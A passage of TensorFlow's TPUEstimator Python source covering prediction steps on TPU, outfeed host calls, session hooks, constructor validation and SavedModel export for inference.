def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of predict_fn, host_calls, and captured scaffold_fn. The
predict_fn representing the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_predict_hooks = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU prediction must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions)
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_predict_hooks.capture(tpu_estimator_spec.prediction_hooks)
to_record = {}
identity_fn = lambda **kwargs: kwargs
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return (predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks)
def _verify_tpu_spec_predictions(self, predictions):
"""Validates TPUEstimatorSpec.predictions dict."""
# TODO(xiejw): Adds validation for prediction dictionrary.
# TODO(xiejw): Adds support for single tensor as predictions.
if not isinstance(predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
for (key, tensor) in predictions.items():
if tensor.shape.dims[0].value is None:
raise ValueError(
'The tensor with key ({}) in TPUEstimatorSpec.predictions has '
'dynamic shape (should be static). Tensor: {}'.format(key, tensor))
return predictions
def _validate_model_features_and_labels(self, features, labels,
is_export_mode):
"""Validates that the features and labels for the model function are valid.
A valid features/labels object is the one with:
- Type: A tensor or any nested structure of tensors supported by TF nest,
namely nested dictionary, tuple, namedtuple, or sequence of tensors.
- Static shape if is_export_mode is False.
Args:
features: the features that would be input to the model function.
labels: the labels that would be input to the model function.
is_export_mode: boolean value specifying if in export mode.
Raises:
TypeError: If features/labels are not of the correct type.
ValueError: If features/labels have dynamic shape.
"""
def validate(obj, obj_name):
"""Helper validate function."""
if is_export_mode or self._ctx.is_running_on_cpu(is_export_mode):
return
if isinstance(obj, ops.Tensor):
if not obj.get_shape().is_fully_defined():
raise ValueError(
'The {} to the model returned by input_fn must have static shape.'
' Tensor: {}'.format(obj_name, obj))
else:
for tensor in data_nest.flatten(obj):
if not tensor.get_shape().is_fully_defined():
raise ValueError(
('The {} to the model returned by input_fn must have static '
'shape. Tensor: {}').format(obj_name, tensor))
validate(features, 'features')
if labels is not None:
validate(labels, 'labels')
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
self._validate_model_features_and_labels(features, labels, is_export_mode)
model_fn_args = function_utils.fn_args(self._model_fn)
kwargs = {}
# Makes deep copy with `config` and params` in case user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
_add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn)
running_on_cpu = self._ctx.is_running_on_cpu(is_export_mode)
# In export mode, params['use_tpu'] has already been set based on mode
# (i.e. True for _REWRITE_FOR_INFERENCE_MODE, False otherwise).
if not is_export_mode:
_add_item_to_params(params, _USE_TPU_KEY, not running_on_cpu)
if not running_on_cpu:
user_context = tpu_context.TPUContext(
internal_ctx=self._ctx, call_from_input_fn=False)
_add_item_to_params(params, _CTX_KEY, user_context)
estimator_spec = self._model_fn(features=features, **kwargs)
if (running_on_cpu and
isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)): # pylint: disable=protected-access
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`.
return estimator_spec.as_estimator_spec()
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(
err_msg.format('training_chief_hooks') + 'If you want' +
' to pass training hooks, please pass via training_hooks.')
if estimator_spec.scaffold:
logging.warning('EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = function_utils.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
with ops.device(tpu.core(0)):
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
across all shards. The concatenated function is passed to the host_fn and
executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return {}
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
# constraint it such that we have at most one outfeed dequeue and enqueue
# per replica.
for i in xrange(self._ctx.num_replicas):
host_device, ordinal_id = self._ctx.device_for_replica(i)
with ops.device(host_device):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal_id)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
flat_dequeue_ops = []
for l in dequeue_ops:
flat_dequeue_ops.extend(l)
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos +
len(self._tensors[name])]
pos += len(self._tensors[name])
def _call_host_fn(fn, *args, **kw):
context = CatchInvalidHostcallFunctions()
context.Enter()
result = fn(*args, **kw)
context.Exit()
context.ExitResult(result)
return result
# It is assumed evaluation always happens on single host TPU system. So,
# place all ops on tpu host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with ops.device(self._ctx.tpu_host_placement_function(replica_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
# TODO(xiejw): Make the specification of the outfeed combinaton
# function more explicit and well-documented. We may want to give the
# user the option of concatenating along any axis.
if (self._ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST):
# If the infeed is in BROADCAST mode (each core recieving the same
# input), then we assume that the cores also produce identical
# copies of the same output, and we simply take the output from
# the first core. This mode is used by Mesh-TensorFlow.
with ops.control_dependencies(dequeue_ops[i]):
dequeue_ops[i] = array_ops.identity(dequeue_ops[i][0])
else:
# Assume that the input has been batch-split and that axis 0 of the
# output tensors represents the batch size. Concatenate along
# the axis 0 to re-combine the batch.
dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = _call_host_fn(self._host_fns[name], **dequeue_ops)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
else:
ret[name] = _call_host_fn(self._host_fns[name], *dequeue_ops)
# force all dequeue operations to be run if not consumed by the host calls
ret['__force_dequeue'] = control_flow_ops.group(*flat_dequeue_ops)
return ret
class _OutfeedHostCallHook(session_run_hook.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return basic_session_run_hooks.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook):
"""Calculate and report global_step/sec and examples/sec during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
global_step_per_sec = elapsed_steps / elapsed_time
examples_per_sec = self._batch_size * global_step_per_sec
if self._summary_writer is not None:
global_step_summary = Summary(value=[
Summary.Value(tag='global_step/sec', simple_value=global_step_per_sec)
])
example_summary = Summary(value=[
Summary.Value(tag='examples/sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(global_step_summary, global_step)
self._summary_writer.add_summary(example_summary, global_step)
logging.info('global_step/sec: %g', global_step_per_sec)
logging.info('examples/sec: %g', examples_per_sec)
class InstallSignalHandlerHook(session_run_hook.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator also supports training on CPU and GPU. You don't need to define
a separate `tf.estimator.Estimator`.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` get per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation. If eval_on_tpu is False, the evaluation will execute on
CPU or GPU; in this case the following discussion on TPU evaluation does not
apply.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of any nested structure of `Tensor`s (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
predict will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker) except
BROADCAST mode.
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.metrics.precision(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
It is not designed for latency-critical system. In addition, due to some
usability issues, for prediction with small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
data from the generator so that TPUEstimator can shutdown the TPU system
properly for user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random_uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
`export_savedmodel` exports 2 metagraphs, one with `tag_constants.SERVING`,
and another with `tag_constants.SERVING` and `tag_constants.TPU`.
At serving time, these tags are used to select metagraph to load.
Before running the graph on TPU, TPU system needs to be initialized. If
TensorFlow Serving model-server is used, this is done automatically. If
not, please call `session.run(tpu.initialize_system())`.
`tpu.outside_compilation` can be used to wrap TPU incompatible ops in
`model_fn`.
Example:
----------------
```
def model_fn(features, labels, mode, config, params):
...
logits = ...
export_outputs = {
'logits': export_output_lib.PredictOutput(
{'logits': logits})
}
def host_call(logits):
class_ids = math_ops.argmax(logits)
classes = string_ops.as_string(class_ids)
export_outputs['classes'] =
export_output_lib.ClassificationOutput(classes=classes)
tpu.outside_compilation(host_call, logits)
...
```
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None,
eval_on_tpu=True,
export_to_tpu=True,
export_to_cpu=True,
warm_start_from=None,
experimental_export_device_assignment=False,
experimental_embedding_config_spec=None):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator` which returns
EstimatorSpec or TPUEstimatorSpec. `training_hooks`, 'evaluation_hooks',
and `prediction_hooks` must not capure any TPU Tensor inside the
model_fn.
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator to
continue training a previously saved model. If `None`, the model_dir in
`config` will be used if set. If both are set, they must be same. If
both are `None`, a temporary directory will be used.
config: An `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently, -
TPU training and evaluation respect this bit, but eval_on_tpu can
override execution of eval. See below. - Predict still happens on CPU.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`. Must be divisible by total
number of replicas.
eval_batch_size: An int representing evaluation batch size. Must be
divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size. Must be
divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the
model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`.
export_to_tpu: If True, `export_savedmodel()` exports a metagraph for
serving on TPU. Note that unsupported export modes such as EVAL will be
ignored. For those modes, only a CPU model will be exported.
Currently, export_to_tpu only supports PREDICT.
export_to_cpu: If True, `export_savedmodel()` exports a metagraph for
serving on CPU.
warm_start_from: Optional string filepath to a checkpoint or SavedModel to
warm-start from, or a `tf.estimator.WarmStartSettings` object to fully
configure warm-starting. If the string filepath is provided instead of
a `WarmStartSettings`, then all variables are warm-started, and it is
assumed that vocabularies and Tensor names are unchanged.
experimental_export_device_assignment: Whether to include the device
assignment in the exported model. Doing so is useful in case of model
parallel inference but will tie the exported model to the TPU topology
used to export the model.
experimental_embedding_config_spec: Optional EmbeddingConfigSpec instance
to support using TPU embedding. IT IS STILL WORK IN PROGRESS, SO PLEASE
DO NOT USE.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but existed in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _InternalTPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.num_cores_per_replica):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Overwrite log_step_count_steps to disable TensorLoggingHook and
# StepCounterHook from being created in Estimator. TPUEstimator already
# added equivalent hooks in _augment_model_fn above.
self._log_every_n_steps = config.log_step_count_steps
config = config.replace(log_step_count_steps=None)
# Passing non-None params as wrapped model_fn has it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params,
warm_start_from=warm_start_from)
self._iterations_per_training_loop = (
self._config.tpu_config.iterations_per_loop)
# All properties passed to _InternalTPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(
self._config, train_batch_size, eval_batch_size, predict_batch_size,
use_tpu, eval_on_tpu, experimental_embedding_config_spec)
self._export_to_cpu = export_to_cpu
self._export_to_tpu = export_to_tpu
self._experimental_export_device_assignment = (
experimental_export_device_assignment)
self._is_input_fn_invoked = None
self._rendezvous = {}
def _add_meta_graph_for_mode(self,
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=True,
mode=model_fn_lib.ModeKeys.PREDICT,
export_tags=None,
check_variables=True,
strip_default_attrs=True):
if self._export_to_tpu and mode != model_fn_lib.ModeKeys.PREDICT:
logging.warning('TPUEstimator only handles mode PREDICT for exporting '
'when `export_to_tpu` is `True`; Mode {} will be ignored '
'for TPU.'.format(mode))
if not self._export_to_cpu and not self._export_to_tpu:
raise ValueError('One of export_to_cpu and export_to_tpu must be true.')
if self._export_to_cpu:
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
if self._export_to_tpu and mode == model_fn_lib.ModeKeys.PREDICT:
input_receiver_fn_map = {
_REWRITE_FOR_INFERENCE_MODE: input_receiver_fn_map[mode]
}
export_tags = [tag_constants.SERVING, tag_constants.TPU]
mode = _REWRITE_FOR_INFERENCE_MODE
# See b/110052256 for why `check_variables` is `False`.
if not self._export_to_cpu:
check_variables = save_variables = True
else:
check_variables = save_variables = False
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
def _call_model_fn(self, features, labels, mode, config):
if mode == _REWRITE_FOR_INFERENCE_MODE:
return self._call_model_fn_for_inference(features, labels, mode, config)
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
def _call_model_fn_for_inference(self, features, labels, mode, config):
"""Wraps `_call_model_fn` for `export_savedmodel`."""
if mode != _REWRITE_FOR_INFERENCE_MODE:
raise ValueError('mode must be {}; '
'got {}.'.format(_REWRITE_FOR_INFERENCE_MODE, mode))
computation, capture = self._build_computation_for_inference(
features, labels, mode, config)
tensors = call_computation(
computation,
self._experimental_export_device_assignment)
estimator_spec, export_outputs_dict, predictions_dict, none_indices = (
capture.get())
predictions_list = tensors[:len(predictions_dict)]
export_outputs_list_without_none = tensors[len(predictions_dict):]
# Reinsert `None`s which we've taken out in
# `_build_computation_for_inference()`.
export_outputs_list = []
while none_indices or export_outputs_list_without_none:
if none_indices and none_indices[0] == len(export_outputs_list):
export_outputs_list.append(None)
none_indices.pop(0)
else:
export_outputs_list.append(export_outputs_list_without_none.pop(0))
# Reconstruct `export_outputs` with updated tensors.
new_export_outputs_dict = nest.pack_sequence_as(export_outputs_dict,
export_outputs_list)
export_outputs = estimator_spec.export_outputs
new_export_outputs = collections.OrderedDict(
(k, _clone_export_output_with_tensors(export_outputs[k], v))
for k, v in six.iteritems(new_export_outputs_dict))
# Reconstruct `predictions` with updated tensors.
new_predictions = nest.pack_sequence_as(predictions_dict, predictions_list)
if (len(new_predictions) == 1 and
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR in new_predictions):
new_predictions = new_predictions[_KEY_WHEN_PREDICTIONS_IS_A_TENSOR]
return estimator_spec._replace(
export_outputs=new_export_outputs, predictions=new_predictions)
def _build_computation_for_inference(self, features, labels, mode, config):
capture = _CapturedObject()
def computation():
"""Computation to be passed to `TPUPartitionedCall()`."""
tpu_computation, tpu_capture = self._build_tpu_computation_for_inference(
features, labels, mode, config)
if self._experimental_export_device_assignment:
# Export the device assignment as part of the model. This is useful for
# model parallel usecases where the model relies on the mapping between
# logical and physical devices.
with self._ctx.with_mode(mode) as ctx:
device_assignment = ctx.device_assignment
else:
device_assignment = None
if self._experimental_export_device_assignment:
tensors_on_cpu = tpu.rewrite_for_inference(
tpu_computation, device_assignment=device_assignment)
else:
tensors_on_cpu = tpu.rewrite(
tpu_computation, device_assignment=device_assignment)
tpu.prune_unconnected_ops_from_xla(ops.get_default_graph())
(estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict) = (
tpu_capture.get())
predictions_list = tensors_on_cpu[:len(predictions_dict)]
export_outputs_tpu_on_cpu_list = tensors_on_cpu[len(predictions_dict):]
# Reconstruct tensors used in export_outputs, with TPU tensors replaced
# with their CPU counterpart returned from `rewrite_for_inference()`.
# `function.Defun()` does not like `None`s in return values, so we leave
# `None`s out but record their positions for later reconstruction.
export_outputs_list_without_none = []
none_indices = []
for i, t in enumerate(export_outputs_list):
if t is None:
none_indices.append(i)
else:
export_outputs_list_without_none.append(
export_outputs_tpu_on_cpu_list.pop(0))
capture.capture((estimator_spec, export_outputs_dict, predictions_dict,
none_indices))
return predictions_list + export_outputs_list_without_none
return computation, capture
def _build_tpu_computation_for_inference(self, features, labels, mode,
config):
capture = _CapturedObject()
def computation():
"""Compute tpu tensors used in export_outputs.
Passed to rewrite_for_inference so that model_fn will be called under
the rewriting contexts. Only tpu tensors are returned, but export_outputs
and scaffold are captured.
Returns:
A list of Tensors used in export_outputs and not marked for
outside_compilation.
"""
# We should only call model fn once and it should be inside `computation`
# so that building the graph will happen under `rewrite_for_inference`.
estimator_spec = super(TPUEstimator, self)._call_model_fn(
features, labels, mode, config)
# We pick the TPU tensors out from `export_output` and later return them
# from `computation` for rewriting.
export_outputs_dict = collections.OrderedDict(
(k, _export_output_to_tensors(v))
for k, v in six.iteritems(estimator_spec.export_outputs))
export_outputs_list = nest.flatten(export_outputs_dict)
export_outputs_tpu_list = [
t for t in export_outputs_list if t is not None
]
if isinstance(estimator_spec.predictions, dict):
predictions_dict = collections.OrderedDict(
(k, v) for k, v in six.iteritems(estimator_spec.predictions))
else:
predictions_dict = {
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR: estimator_spec.predictions
}
predictions_list = nest.flatten(predictions_dict)
# We cannot return everything we want through the return values, so
# capture the rest here for later use.
capture.capture((estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict))
return predictions_list + export_outputs_tpu_list
return computation, capture
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
